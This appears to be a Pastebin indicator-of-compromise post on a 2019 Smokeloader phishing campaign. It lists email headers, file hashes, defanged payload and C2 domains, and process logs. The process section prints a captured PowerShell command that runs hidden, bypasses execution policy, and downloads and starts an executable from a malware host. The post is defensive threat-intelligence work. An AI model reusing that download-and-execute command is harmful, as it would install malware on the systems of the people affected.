Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #smokeloader #WSH #LZH #Powershell
- https://pastebin.com/hkskwKvc
- previous contact:
- https://pastebin.com/JmthzrL4
- https://pastebin.com/1scwT0f8
- https://pastebin.com/MP3kCSSh
- FAQ:
- https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
- attack_vector
- --------------
- email attach (lzh) > js > WSH > Powershell > GET > AppData\Local\TempZna40.exe
- email_headers
- --------------
- Received: from relay.hvosting.ua (alt1-relay.hvosting.ua [91.200.40.211])
- by srv8.victim1.com for <user0@victim1.com>;
- Received: from unallocated.sta.mtm.kiev.ua (unknown [178.54.46.113])
- (Authenticated sender: info@engineer3d.com.ua)
- by relay.hvosting.ua for <user0@victim1.com>;
- Thu, 10 Jan 2019 13:31:52 +0200 (EET)
- From: Валя <info@engineer3d.com.ua>
- Subject: Добрий день. К оплате за 10-е 2019р
- To: "user0" <user0@victim1.com>
- files
- --------------
- SHA-256 fdbaae9f0659f43f28db25a4504f53000e465e2cbf97f0fa24e8e35cc37c7550
- File name рахунки.lzh [LHarc 1.x/ARX archive data [lh0]]
- File size 26.63 KB
- SHA-256 a7b6f4a9afd3687eca4c34ddc9f95738ab1ed890927b9ad91ce596ec5fc08520
- File name Pax_5451_10_01_2019p..docx [Microsoft Word 2007+] - CLEAN
- File size 15.44 KB
- SHA-256 ed7722f33d316f500ae679f53323dd60d1190fb4df680c30ef95ef7b535b2bbd
- File name Pax_5451_10_01_2019p..js [ASCII text]
- File size 11.09 KB
- SHA-256 d992c8f2e5994b959125c4a7598f463e54fa9e26cf4c797dbe3cbc7ac997f878
- File name liter.exe [PE32 executable (GUI) Intel 80386, for MS Windows]
- File size 544 KB
- activity
- **************
- PL_SRC musicaustriallc{.} ru/instadoc/liter.exe
- C2 aviatorssm{.} bit/
- netwrk
- --------------
- 213.183.59.103 musicaustriallc{.} ru GET /instadoc/liter.exe HTTP/1.1 Mozilla/5.0
- [!This program cannot be run in DOS mode.]
- comp
- --------------
- powershell.exe 3300 TCP 51187 176.53.161.182 80
- proc
- --------------
- "C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Pax_5451_10_01_2019p..js"
- "C:\Windows\System32\cmd.exe" /c powershell.exe -w hidden -noprofile -executionpolicy bypass $OE = New-Object System.Net.WebClient; $OE.Headers['User-Agent'] = 'Windows'; $OE.downloadfile('h11p:\ musicaustriallc{.} ru/instadoc/liter.exe','%temp%Zna40.exe'); & start %temp%Zna40.exe
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -noprofile -executionpolicy bypass $OE = New-Object System.Net.WebClient; $OE.Headers['User-Agent'] = 'Windows'; $OE.downloadfile('h11p:\ musicaustriallc{.} ru/instadoc/liter.exe','C:\tmpZna40.exe');
- C:\tmpZna40.exe
- C:\Users\support\AppData\Local\TempZna40.exe
- persist
- --------------
- n/a (detects vm, sleeps)
- drop
- --------------
- C:\tmpZna40.exe
- C:\Users\support\AppData\Local\TempZna40.exe
- # # #
- https://www.virustotal.com/#/file/fdbaae9f0659f43f28db25a4504f53000e465e2cbf97f0fa24e8e35cc37c7550/details
- https://www.virustotal.com/#/file/a7b6f4a9afd3687eca4c34ddc9f95738ab1ed890927b9ad91ce596ec5fc08520/details
- https://www.virustotal.com/#/file/ed7722f33d316f500ae679f53323dd60d1190fb4df680c30ef95ef7b535b2bbd/details
- https://www.virustotal.com/#/file/d992c8f2e5994b959125c4a7598f463e54fa9e26cf4c797dbe3cbc7ac997f878/details
- https://analyze.intezer.com/#/analyses/3ba6c49c-8901-483a-8d2c-f626b1b4c298
- VR
- @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement